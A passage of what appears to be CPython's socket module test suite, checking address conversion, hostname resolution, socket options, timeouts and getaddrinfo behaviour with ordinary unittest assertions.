# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType', str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test3542SocketOptions(self):
# Ref. issue #35569 and https://tools.ietf.org/html/rfc3542
opts = {
'IPV6_CHECKSUM',
'IPV6_DONTFRAG',
'IPV6_DSTOPTS',
'IPV6_HOPLIMIT',
'IPV6_HOPOPTS',
'IPV6_NEXTHOP',
'IPV6_PATHMTU',
'IPV6_PKTINFO',
'IPV6_RECVDSTOPTS',
'IPV6_RECVHOPLIMIT',
'IPV6_RECVHOPOPTS',
'IPV6_RECVPATHMTU',
'IPV6_RECVPKTINFO',
'IPV6_RECVRTHDR',
'IPV6_RECVTCLASS',
'IPV6_RTHDR',
'IPV6_RTHDRDSTOPTS',
'IPV6_RTHDR_TYPE_0',
'IPV6_TCLASS',
'IPV6_USE_MIN_MTU',
}
for opt in opts:
self.assertTrue(
hasattr(socket, opt), f"Missing RFC3542 socket option '{opt}'"
)
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if fqhn not in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [socket_helper.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test socket_helper.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [socket_helper.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = (
l_bad_values +
[_testcapi.INT_MIN-1, _testcapi.INT_MAX+1] +
[1 << 16, _testcapi.INT_MAX]
)
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = socket_helper.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate that it is
# reasonable to get the host's addr in addition to 0.0.0.0, at least
# for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# A newly created socket should have SO_REUSEADDR disabled (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertEqual(reuse, 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertNotEqual(reuse, 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .proto
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = socket_helper.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = socket_helper.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if socket_helper.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test the workaround for an OS X platform bug that could segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with socket_helper.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(TimeoutError, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
encoding = None if "b" in mode else "utf-8"
with sock.makefile(mode, encoding=encoding) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(socket_helper.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (socket_helper.HOSTv6, 0, -10))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or is undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
